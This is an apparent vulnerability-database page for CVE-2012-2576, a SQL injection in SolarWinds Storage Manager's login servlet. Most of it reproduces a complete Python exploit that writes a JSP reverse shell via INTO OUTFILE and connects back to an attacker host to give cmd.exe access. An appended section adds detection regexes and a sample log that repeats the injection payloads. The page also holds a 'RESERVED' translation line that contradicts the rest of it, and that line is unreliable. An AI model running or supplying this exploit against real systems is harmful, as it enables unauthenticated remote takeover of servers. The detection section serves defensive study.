CVE-2012-2576
CVSS 10.0
Published: 2017-12-20 16:29:00
Revised: 2018-01-11 09:26:31
NME    

[Original] SQL injection vulnerability in the LoginServlet page in SolarWinds Storage Manager before 5.1.2, SolarWinds Storage Profiler before 5.1.2, and SolarWinds Backup Profiler before 5.1.2 allows remote attackers to execute arbitrary SQL commands via the loginName field.


[CNNVD] No CNNVD data available yet.


[Machine translation] ** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can lead to complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [attacker needs neither intranet nor local access]
Authentication: NONE [no authentication required to exploit]

- CWE (weakness category)

CWE-89 [Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2576
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2576
(official data source) NVD

- Other links and resources

http://www.exploit-db.com/exploits/18818
(VENDOR_ADVISORY)  EXPLOIT-DB  18818
http://www.exploit-db.com/exploits/18833
(VENDOR_ADVISORY)  EXPLOIT-DB  18833
http://www.securityfocus.com/bid/51639
(VENDOR_ADVISORY)  BID  51639
http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm
(VENDOR_ADVISORY)  CONFIRM  http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm
https://exchange.xforce.ibmcloud.com/vulnerabilities/72680
(VENDOR_ADVISORY)  XF  solarwnds-loginservlet-sql-injection(72680)

- Vulnerability information (18818)

Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit (EDBID:18818)
windows remote
2012-05-01 Verified
0 muts
#!/usr/bin/python
######################################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################


import urllib, urllib2, cookielib
import sys
import random

print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit"
print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 4):
	print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
	exit(0)

rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
	filename+=i
filename +=".jsp"

output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename

jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
	class StreamConnector extends Thread
	{
		InputStream is;
		OutputStream os;

		StreamConnector( InputStream is, OutputStream os )
		{
		this.is = is;
		this.os = os;
		}

		public void run()
		{
		BufferedReader in  = null;
		BufferedWriter out = null;
try
{
	in  = new BufferedReader( new InputStreamReader( this.is ) );
	out = new BufferedWriter( new OutputStreamWriter( this.os ) );
	char buffer[] = new char[8192];
	int length;
	while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
	{
		out.write( buffer, 0, length );
		out.flush();
	}
} catch( Exception e ){}
try
{
	if( in != null )
		in.close();
	if( out != null )
		out.close();
} catch( Exception e ){}
		}
	}

	try
	{
		Socket socket = new Socket( "''' + lhost +'''", '''+lport+''');
		Process process = Runtime.getRuntime().exec( "cmd.exe" );
		( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
		( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
	} catch( Exception e ) {}
%>'''

jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")

prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate='checkLogin'
password = 'OHAI'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password})
print "[*] Sending evil payload"
resp = opener.open("http://%s:9000/LoginServlet" %rhost, post_params)
print "[*] Triggering shell"
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpayload,'password' : password})
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s"  % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)

# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111 
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100
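Added example (not from the page, exploit-db or SolarWinds): detection logic that flags the request pattern the exploit above produces, a quote-break followed by UNION SELECT or a tautology plus INTO OUTFILE in the loginName field of a POST to /LoginServlet, and the follow-up GET for a random six-character .jsp under ROOT. It runs over constructed request log lines in an assumed "METHOD PATH BODY" format; the servlet path, parameter names and output directory are taken from the page.

```python
import re
from urllib.parse import parse_qs, urlencode

# Indicators seen in the exploit: quote-break + UNION SELECT, quote-break +
# tautology, INTO OUTFILE (MySQL file write) and a trailing comment terminator.
SQLI_PATTERNS = {
    "quote_union_select": re.compile(r"'\s*union\s+select", re.I),
    "quote_tautology":    re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
    "into_outfile":       re.compile(r"\binto\s+outfile\b", re.I),
    "comment_terminator": re.compile(r"(#|--)\s*$"),
}
# The exploit drops a random six-character .jsp directly under webapps/ROOT.
DROPPED_JSP = re.compile(r"^/[a-z0-9]{6}\.jsp$", re.I)

def analyze_request(method, path, body=""):
    """Return the list of finding names for one request (empty if benign)."""
    findings = []
    if method == "POST" and path == "/LoginServlet":
        params = parse_qs(body, keep_blank_values=True)
        login_name = params.get("loginName", [""])[0]   # decoded field value
        for name, pat in SQLI_PATTERNS.items():
            if pat.search(login_name):
                findings.append("loginName:" + name)
    if method == "GET" and DROPPED_JSP.match(path):
        findings.append("path:unexpected_root_jsp")
    return findings

def scan_log(lines):
    """Parse 'METHOD PATH BODY' lines; return (line_no, findings) for hits only."""
    hits = []
    for no, line in enumerate(lines, 1):
        parts = line.split(" ", 2)
        body = parts[2] if len(parts) == 3 else ""
        f = analyze_request(parts[0], parts[1], body)
        if f:
            hits.append((no, f))
    return hits

# Constructed sample log (assumed format), built with the same encoding a
# form POST would use; the paths and parameter names come from the page.
def _req(login_name):
    return "POST /LoginServlet " + urlencode(
        {"loginState": "checkLogin", "loginName": login_name, "password": "x"})

SAMPLE_LOG = [
    _req("alice"),
    _req("AAA' union select 0x41,2,3 into outfile "
         "\"c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/ab12cd.jsp\"#"),
    _req("1' or 1=1#--"),
    "GET /ab12cd.jsp",
    "GET /index.jsp",
]
```

Feeding the sample log to `scan_log` flags lines 2, 3 and 4 and leaves the normal login and `/index.jsp` alone; a real deployment would need the decoded POST body from the application or a reverse proxy, since plain access logs do not record it.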